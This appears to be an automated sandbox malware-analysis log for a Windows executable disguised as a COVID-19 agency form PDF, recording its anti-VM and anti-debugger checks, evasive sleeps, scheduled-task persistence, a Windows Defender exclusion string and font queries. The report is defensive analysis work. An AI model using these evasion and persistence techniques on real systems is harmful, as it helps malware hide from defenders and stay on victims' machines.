Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information set: NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 5700 Thread sleep time: -42124s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 5920 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 3164 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe TID: 5224 Thread sleep time: -120000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, 6_2_00403D74
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Thread delayed: delay time: 42124 Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Thread delayed: delay time: 60000 Jump to behavior
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.228699626.0000000006C9C000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:ringFileInfo
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process queried: DebugPort Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 6_2_0040317B mov eax, dword ptr fs:[00000030h] 6_2_0040317B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 6_2_00402B7C GetProcessHeap,RtlAllocateHeap, 6_2_00402B7C
Enables debug privileges
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp' Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
